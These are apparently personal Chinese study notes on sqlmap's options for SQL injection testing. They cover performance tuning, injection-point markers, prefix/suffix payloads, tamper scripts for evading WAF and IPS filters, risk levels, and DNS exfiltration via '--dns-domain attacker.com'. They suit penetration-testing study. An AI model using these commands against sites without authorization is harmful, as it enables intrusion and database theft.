sqlmap自动注入

Optimization

【优化性能参数，可提高效率】

-o：指定前三个参数(--predict-output、--keep-alive、--null-connection)

--predict-output：

根据检测方法，比岁返回值和统计表内容，不断缩小检测范围，提高检测效率

可检测的返回值：版本名、用户名、密码、Privaleges、role、数据库名称、表名、列名

与--threads参数不兼容

统计表：/usr/share/sqlmap/txt/common-outputs.txt

--keep-alive：【可避免出现异常连接很大的情况，而触发报警】

使用http(s)长连接，性能好

与--proxy参数不兼容

长连接避免重复建立连接的网络开销，但大量长连接会严重占用服务器资源

--null-connection：

只获取相应页面的大小值，而非页面具体内容

通常用于盲注判断 真/假，降低网络带宽消耗

与--text-only参数不兼容（基于页面内容的比较判断 真/假）

--threads：【默认情况下为1】

最大并发线程

盲注是每个线程获取一个字符（7次请求<--低位ASCII码），获取完成后线程结束

默认值为1，建议不要超过10，否则可能影响站点可用性

与--predict-output参数不兼容

Injection

-p:

指定扫描的参数，除了该参数，不探测其他参数，使--level失效

-p "User-Agent,referer"　　#指定此两个参数

--skip：

排除指定的扫描参数

--level=5 --skip="id,user-agent"

URI注入点:【若URL地址中变量的名称和值，都通过URL表示（看起来像目录），需要手动在变量后加一个星号作为标志】(URI与URL)

sqlmap -u "http://targeturl/value1*/param2/value2/"

##############################################################################

#伪静态页面，URL重写，实际上只是看起来像是一个静态页面【如何识别伪静态页面】

##############################################################################

--dbms:　　【指定扫描服务器的数据库类型】

--ddbms="mysql"

--os:

Linux/Windows

--invalid-bignum / --invalid-logical

通常sqlmap使用负数使参数取值失效，即id=13->id=13

bignum使用大数使参数值失效 id==99999999999

Logical使用布尔判断使取值失效 id=13 AND 18=19

 --no-cast

榨取数据时，sqlmap将所有结果转换为字符串，并用空格代替NULL结果

在老版本mysql数据库需要开启此开关

 --no-escape【sqlmap默认下几乎没有通过编码逃逸的配置】

出于混淆和避免出错的目的，payload中用单引号界定字符串时，sqlmap使用char()编码逃逸的方法替换字符串

###SELECT 'foo' --》SELECT CHAR(102)+CHAR(111)+CHAR(111)

本参数关闭此功能

--prefix / --suffix　　【前缀/后缀】

$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";

##如：sqlmap -u "http://1.1.1.1/sqlmap/mysql/get_str_brackets.php?id=1" -p id

--prefix "’)" --suffix "AND (’abc’=’abc“

query = "SELECT * FROM users WHERE id=(’1’) <PAYLOAD> AND

(’abc’=’abc’) LIMIT 0, 1";

 --tamper　　【前提：发现扫描被过滤】

指定混淆脚本，同于绕过应用层过滤、IPS、WAF

sqlmap -u "http://dadad" --

#脚本位置：/usr/share.sqlmap/tamper　　【可使用dpkg -L sqlmap | grep tam  筛选】

sqlmap -u "http://URL" --tamper="tamper/between.py.tamper/randomcase.py.tamper/space2comment.py" -v 3　　#【-v:显示详细信息】

Detection【检测】

 --level

1-5级 （默认1）

/usr/share/sqlmap/xml/payloads

 --risk

1-4 (默认1/无害)

Risk升高可造成数据被篡改等风险 （update）

--string,--not-string,--regexp,--code,--text-only,--titles 【指定根据返回的类型作为注入判断依据】

页面比较，基于布尔的注入检测，依据返回页面内容的变化判断真假逻辑，但有些页面岁时间刻度变化，此时需要认为指定标识真假的字符串

 Techniques 【检测SQL注入存在的技术类型】

默认使用全部技术

B:Boolean-based blind

E:Error-based

U:Union query-based

S:Stacked queries (文件系统、操作系统、注册表时，必须使用)

T:Time-based Blind

--time-sec

基于时间的注入检测响应延迟时间（默认5秒）

--union-cols

默认联合查询1-10列，随--level增加最多支持50列

--union-clos 6-9

--union-char

联合查询默认使用NULL，极端情况下NULL可能失效，此时可手动指定数值

--union-char 123 【需事先对web application进行分析】

--dns-domain

场景：攻击者控制了某DNS服务器，使用此功能可以提高数据榨取速率

--dns-domain attacker.com

--second-order

在一个页面注入的结果，从另一个页面体现出来

--second-order http://1.1.1.1/b.php

Fingerprint【指纹信息】

-f,--fingerprint,-b,---banner

数据库管理系统指纹信息

DBMS，操作系统，架构，补丁